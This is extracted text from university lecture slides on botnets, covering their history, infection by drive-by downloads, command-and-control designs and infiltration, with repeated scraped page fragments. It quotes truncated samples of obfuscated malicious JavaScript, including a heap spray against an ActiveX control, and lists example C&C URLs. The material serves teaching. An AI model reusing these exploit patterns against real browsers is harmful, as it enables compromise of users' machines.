w1 w1-4 Botnet PDF

Malicious Software and its Underground Economy
Two Sides to Every Story
Botnets
Lorenzo Cavallaro
Information Security Group Royal Holloway, University of London
Jun 17, 2013Week 1-4
(Week 1-4) Lorenzo Cavallaro (ISG@RHUL)
Malware and its Underground Economy
Jun 17, 2013Week 1-4
1 / 23
Botnets I
Bot
Autonomous programs performing tasks More recent trend in malicious development
Benign bots
First bots were programs used for Internet Relay Chat (IRC) React to events in IRC channels Typically oer useful services
Early denition of bot An IRC user who is actually a program. On IRC, typically the robot provides some useful service. Examples are NickServ, which tries to prevent random users from adopting nicks already claimed by others.
Jun 17, 2013Week 1-4
2 / 23
Botnets II
Eggdrop bot (1993)

Used to manage IRC chat channels when the operator was away
Still maintained, see http://eggheads.org
Malicious IRC bots started to evolve

Takeover wars to control certain IRC channels Trash talking (ooding) Also involved in Denial of Service (DoS) to force IRC net split IRC proxies to hide attackers origin
A number of parallel, malicious developments
Jun 17, 2013Week 1-4
3 / 23
History I
How did we get here? Early 1990s: IRC bots

Automated management of IRC channels
19992000: Distributed DoS tools (distribution)

Trinoo, TFN2k, Stacheldraht
19982000: Trojan Horse (remote control)

BackOrice, BackOrice2k, SubSeven
2001today: Worms (spreading)

Code Red, Blaster, Sasser
Jun 17, 2013Week 1-4
4 / 23
History II
Bots today
Malware (backdoor, Trojan) running on compromised machines Incorporates dierent modules to carry out malicious tasks (spamming, DoS, . . . ) Remote controlled by criminal entity (called bot master or bot herder)
Bots are incorporated in network of compromised machines

Botnets (sizes up to hundreds of thousands of infected machines)
Botnets
Main vehicle for carrying out criminal activities Financial motivation
Jun 17, 2013Week 1-4
5 / 23
Botnets
How do botnets get created?

Infection and spreading
How are bots (and botnets) controlled?

Command and control channel (C&C), robustness features (e.g., fast ux, domain ux, push/pull/P2P)
What are botnets used for?

Criminal applications
How can we mitigate the problem?
Jun 17, 2013Week 1-4
6 / 23
Botnets



Jun 17, 2013Week 1-4
6 / 23
Botnets



Jun 17, 2013Week 1-4
6 / 23
Botnets



Jun 17, 2013Week 1-4
6 / 23
Creation
Host infected by one of

Network worm (vulnerabilities) Email attachment Trojan version of program (ever heard of P2P?) Drive-by-downloads (malicious web sites) Existing backdoor (from previous infection)
Specialized services (PPI, Exploit-as-a-Service)see Week 5
Jun 17, 2013Week 1-4
7 / 23
Drive-By Downloads I
Malicious scripts
Injected into legitimate sites (e.g., via SQL injection) Hosted on malicious sites (URLs distributed via spam) Embedded into ads
Drive-by downloads
Attacks against web browser and/or vulnerable plug-ins Typically launched via client-side scripts (JavaScript, VBScript)
Redirection
Landing page redirects to malicious site (e.g., via iframe) Makes management easier Customize exploits (browser version), serve each IP only once
Jun 17, 2013Week 1-4
8 / 23
Drive-By Downloads II
Malicious JavaScript code
Typically obfuscated and hardened (make analysis more dicult)
function X88MxUL0B(U1TaW1TwV, IyxC82Rbo) { var c5kJu150o = 4294967296; var s3KRUV5X6 = arguments.callee; s3KRUV5X6 = s3KRUV5X6.toString(); s3KRUV5X6 = s3KRUV5X6 + location.href; var s4wL1Rf57 = eval; ... // LR8yTdO7t holds the decoded code try { s4wL1Rf57(LR8yTdO7t); } ... } X88MxUL0B(ACada193b99c...76d9A7d6D676279665F5f81);
Jun 17, 2013Week 1-4
9 / 23
Drive-By Downloads III

function Exhne69P() { var YuL42y0W = unescape("%u9090%u9090... ...%u3030%u3030%u3030%u3030%u3038%u0000"); ... var pvOWGrVU = unescape("%u0c0c%u0c0c"); pvOWGrVU = BAlrZJkW(pvOWGrVU,Hhvo4b_X); for (var cYQZIEiP=0; cYQZIEi P< cFyP_X9B; cYQZIEiP++) { RBGvC9bA[cYQZIEiP]= pvOWGrVU + YuL42y0W; } ... } function a9_bwCED() { try { var OBGUiGAa = new ActiveXObject(Sb.SuperBuddy); if (OBGUiGAa) { Exhne69P(); dU578_go(9); OBGUiGAa.LinkSBIcons(0x0c0c0c0c); } } catch(e) { } return 0; }
Check out Wepawethttp://wepawet.iseclab.org
Jun 17, 2013Week 1-4
10 / 23
Propagation Technique
Remote exploit + drive-by-download
Jun 17, 2013Week 1-4
11 / 23
Jun 17, 2013Week 1-4
12 / 23
link to malicious JS into the site exploit MS06-014 + MS07-004 keylogger/backdoor download 3 days prior the Super Bowl!
Jun 17, 2013Week 1-4
12 / 23
Propagation Techniques
Rogue Antivirus
Jun 17, 2013Week 1-4
13 / 23
Rogue Antivirus
Jun 17, 2013Week 1-4
13 / 23
Rogue Antivirus
Jun 17, 2013Week 1-4
13 / 23
Command & Control
Jun 17, 2013Week 1-4
14 / 23
Command & Control

Centralized control IRC Commands published in IRC channels (irc.krienaicw.pl #djdjeiu) HTTP Commands published in web pages (http://www.myspace.com/angelairiejs/) Distributed control P2P Commands and/or commander address published in the P2P network Push vs. Pull Push The bot silently waits for commands from the commander Pull The bot repeatedly queries the commander to see if there is a new work to do
(Week 1-4) Lorenzo Cavallaro (ISG@RHUL) Malware and its Underground Economy Jun 17, 2013Week 1-4 14 / 23
Command & Control

Centralized control IRC Commands published in IRC channels (irc.krienaicw.pl #djdjeiu) HTTP Commands published in web pages (http://www.myspace.com/angelairiejs/) Distributed control P2P Commands and/or commander address published in the P2P network Push vs. Pull Push The bot silently waits for commands from the commander Pull The bot repeatedly queries the commander to see if there is a new work to do
IRC based botnet

Botmaster
C & C server
Bot
Bot
Bot
Bot
Jun 17, 2013Week 1-4
15 / 23
IRC based botnet

Botmaster
C & C server
Bot
Bot
Bot
The bots continuously (re)connect to the C&C server

IRC based botnet

Botmaster
C & C server
Bot
Bot
Bot
Bot
The bots continuously (re)connect to the C&C server

IRC based botnet

Botmaster
attack a.b.c.d C & C server
Bot
Bot
Bot
Bot
The botmaster sends a command to the C&C server

IRC based botnet

Botmaster
C & C server
Bot
Bot
Bot
Bot
The C&C server forwards the command to all connected bots

IRC based botnet

Botmaster
C & C server
Bot
Bot
Bot
Bot
If the C&C server is isolated, the botmaster loses control of all the bots
IRC based botnet

Botmaster
C & C server
Bot
Bot
Bot
Bot
It could be very dicult to identify the botmaster! (e.g., coee shops or a chain of compromised machines)
IRC based botnet

Botmaster
C & C servers
Bot
Bot
Bot
Bot
Bot
Bot
Multiple C&C servers can be used simultaneously

IRC based botnet

Botmaster
C & C servers
Bot
Bot
Bot
Bot
Bot
Bot
When a C&C server is isolated the bots connect automatically to the others
IRC based botnet

Botmaster
C & C servers
Bot
Bot
Bot
Bot
Bot
Bot
When a C&C server is isolated the bots connect automatically to the others
IRC based botnet

Botmaster
C & C servers
Bot
Bot
Bot
Bot
Bot
Bot
The use of multiple C&C servers increases the lifetime of the botnet
HTTP based botnet

Very similar to botnet based on IRC C&C in pull mode http://91.207.4.122/spm/s_tasks.php?id=468831... http://akhadqwd.blogspot.com/ http://www.myspace.com/sakjfuje/
... <table> <tr> <td class="asjkdha">ddos www.bank.com</td> </tr> </table> ...
C&C trac is dicult to identify Dicult to block at network level (e.g., rewall) Dicult to block at DNS level (e.g., domains blacklisting)
HTTP based botnet

Very similar to botnet based on IRC C&C in pull mode http://91.207.4.122/spm/s_tasks.php?id=468831... http://akhadqwd.blogspot.com/ http://www.myspace.com/sakjfuje/
... <table> <tr> <td class="asjkdha">ddos www.bank.com</td> </tr> </table> ...
C&C trac is dicult to identify Dicult to block at network level (e.g., rewall) Dicult to block at DNS level (e.g., domains blacklisting)
Dynamic rendez-vous points
How does a bot locate the C&C server?

1 2
Hardcoded IP address FustFlux: Hardcoded FQDN or dynamically generated FQDNs (1 FQDN 1 or more IP addresses) DomainFlux: Hardcoded URL or dynamically generated URLs Search keys in the P2P network
3 4
Jun 17, 2013Week 1-4
18 / 23

1 2
3 4
Jun 17, 2013Week 1-4
18 / 23

1 2
3 4
Jun 17, 2013Week 1-4
18 / 23
Preventing the rendez vous
Network level ACLs DNS ACLs HTTP ACLs DDoS against the C&C server?
Jun 17, 2013Week 1-4
19 / 23
P2P based botnet (Storm)
Bot master
Master server Proxy bot
Overnet
Worker bot Worker bot
P2P protocol based on Overnet (derived from Kadmelia)
Jun 17, 2013Week 1-4
20 / 23
Bot master
Overnet
Search for keys in the P2P network to locate the proxys (keys are dynamic and published by the proxies trough the P2P)
Bot master
Overnet
Connect to the proxy and wait for commands (each key is associated with the IP and the port of a new proxy)
Bot master
Overnet
The worker bot connects to the proxy, authenticates itself and waits for commands
Bot master
Overnet
The proxy forwards command from the master to the workers and vice versa
Bot master
Overnet
Bot master
Overnet
Bot master
Overnet
Master servers are controlled directed by the botmaster and are hosted on bullet-proof hosts
Bot master
Overnet
Workers with best resources are elected to proxies
Jun 17, 2013Week 1-4
20 / 23
Fast-ux service network

Authoritative name server Mother-ship Agent5 Agent2 Agent1
Agent3
Agent4 Agent6
Non-authoritative name server
Victim
O line, disinfected, or problematic agents are replaced with others The botnet is tipically composed of millions of agents The identity of the code components of the infrastructure is well protected Multiple domains are used by the same botnet (it is not sucient to shut down a domain)

Agent3
Agent4 Agent6
Victim

Agent3
Agent4 Agent6
Victim

Agent3
Agent4 Agent6
Victim
Inltrate a botnet (IRC C&C)

Botmaster
C & C server
Bot
Bot
Bot
Bot
Jun 17, 2013Week 1-4
22 / 23

Botmaster
C & C server
Bot
Bot
Bot
Bot
The inltrator connects to C&C server as a normal bot and can see all the bots connected

Botmaster
Bot
Bot
Bot
Bot
The inltrator receives commands from the botmaster as the other bots

Botmaster
C & C server
Bot
Bot
Bot
Bot
The inltrator has the ability to send commands to other bots


Botmaster
C & C server
Bot
Bot
Bot
Bot
The inltrator has the ability to send commands to other bots

Inltrate a botnet (HTTP C&C)

Botmaster
C & C server
Bot
Bot
Bot
Bot
Jun 17, 2013Week 1-4
23 / 23

Botmaster
C & C server
Bot
Bot
Bot
Bot
The inltrator connects to the C&C server as a normal bot but he cannot see the other bots connected (C&C pull)

Botmaster
Bot
Bot
Bot
Bot
The inltrator receives commands from the botmaster as the other bots

Botmaster
C & C server
Bot
Bot
Bot
Bot
The inltrator cannot send commands to other bots


Botmaster
C & C server
Bot
Bot
Bot
Bot
The server-side inltrator instead can see the other bots and send them commands

Botmaster
C Botnet & C server Your is My Botnet: Analysis of a Botnet Takeover, Brett Stone-Gross, Marco Cova, Lorenzo Cavallaro,
Bob Gilbert, Martin Szydlowski, Richard Kemmerer, Chris Kruegel, and Giovanni Vigna, In the Proceedings of the 16th ACM Conference on Computer and Communications Security (CCS), 2009
Bot
Bot
Bot
Bot
The server-side inltrator instead can see the other bots and send them commands

w1 w1-4 Botnet PDF

Uploaded by

Document Information

Original Title

Copyright

Available Formats

Share this document

Share or Embed Document

Sharing Options

Did you find this document useful?

Is this content inappropriate?

Copyright:

Available Formats

w1 w1-4 Botnet PDF

Uploaded by

Copyright:

Available Formats

Malicious Software and its Underground Economy

Two Sides to Every Story

Jun 17, 2013Week 1-4

(Week 1-4) Lorenzo Cavallaro (ISG@RHUL)

Malware and its Underground Economy

Jun 17, 2013Week 1-4

(Week 1-4) Lorenzo Cavallaro (ISG@RHUL)

Malware and its Underground Economy

Jun 17, 2013Week 1-4

Eggdrop bot (1993)

Malicious IRC bots started to evolve

A number of parallel, malicious developments

(Week 1-4) Lorenzo Cavallaro (ISG@RHUL)

Malware and its Underground Economy

Jun 17, 2013Week 1-4

How did we get here? Early 1990s: IRC bots

19992000: Distributed DoS tools (distribution)

19982000: Trojan Horse (remote control)

2001today: Worms (spreading)

(Week 1-4) Lorenzo Cavallaro (ISG@RHUL)

Malware and its Underground Economy

Jun 17, 2013Week 1-4

Bots are incorporated in network of compromised machines

(Week 1-4) Lorenzo Cavallaro (ISG@RHUL)

Malware and its Underground Economy

Jun 17, 2013Week 1-4

How do botnets get created?

How are bots (and botnets) controlled?

What are botnets used for?

How can we mitigate the problem?

(Week 1-4) Lorenzo Cavallaro (ISG@RHUL)

Malware and its Underground Economy

Jun 17, 2013Week 1-4

How do botnets get created?

How are bots (and botnets) controlled?

What are botnets used for?

How can we mitigate the problem?

(Week 1-4) Lorenzo Cavallaro (ISG@RHUL)

Malware and its Underground Economy

Jun 17, 2013Week 1-4

How do botnets get created?

How are bots (and botnets) controlled?

What are botnets used for?

How can we mitigate the problem?

(Week 1-4) Lorenzo Cavallaro (ISG@RHUL)

Malware and its Underground Economy

Jun 17, 2013Week 1-4

How do botnets get created?

How are bots (and botnets) controlled?

What are botnets used for?

How can we mitigate the problem?

(Week 1-4) Lorenzo Cavallaro (ISG@RHUL)

Malware and its Underground Economy

Jun 17, 2013Week 1-4

Host infected by one of

Specialized services (PPI, Exploit-as-a-Service)see Week 5

(Week 1-4) Lorenzo Cavallaro (ISG@RHUL)

Malware and its Underground Economy

Jun 17, 2013Week 1-4

(Week 1-4) Lorenzo Cavallaro (ISG@RHUL)

Malware and its Underground Economy

Jun 17, 2013Week 1-4

(Week 1-4) Lorenzo Cavallaro (ISG@RHUL)